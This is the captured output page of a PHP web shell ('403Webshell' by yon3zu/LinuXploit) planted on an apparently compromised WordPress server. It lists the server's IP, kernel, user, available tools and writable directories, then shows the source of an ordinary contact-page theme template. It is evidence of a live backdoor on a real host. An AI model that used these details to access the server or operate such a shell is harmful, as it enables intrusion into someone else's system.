403Webshell
Server IP : 159.223.1.207  /  Your IP : 216.73.217.55
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux Lamp-OutStaff 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.4.15
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wp-content/themes/codeassembly/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wp-content/themes/codeassembly/page-contact-us.php
<?php

    get_header();

    $title = get_field('contacts_page_title');
    $desc = get_field('contacts_page_desc');
    $image = get_field('contacts_page_image');
    $form = get_field('contacts_page_form');
    $first_address = get_field('contacts_first_address');
    $first_map = get_field('contacts_first_map');
    $second_address = get_field('contacts_second_address');
    $second_map = get_field('contacts_second_map');
?>

<main id="content" class="content">
    <div class="contacts-page">
        <div class="container">
            <div class="contacts-page-wrapper">
                <div class="contacts-page-info">
                    <div class="contacts-page-info--text"><?=$desc?></div>
    
                    <img class="contacts-page-info--img" src="<?=$image?>" alt="<?=$title?>">
                </div>
            
                <h1 class="title contacts-page--title"><?=$title?></h1>

                <?=$form?>
            </div>
        </div>
    </div>

    <div class="contacts-map">
        <div class="container">
            <div class="row">
                <div class="col-lg-6">
                    <p class="contacts-map--address"><?=$first_address?></p>

                    <?=$first_map?>
                </div>
                <div class="col-lg-6">
                    <p class="contacts-map--address"><?=$second_address?></p>

                    <?=$second_map?>
                </div>
            </div>
        </div>
    </div>
</main>

<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit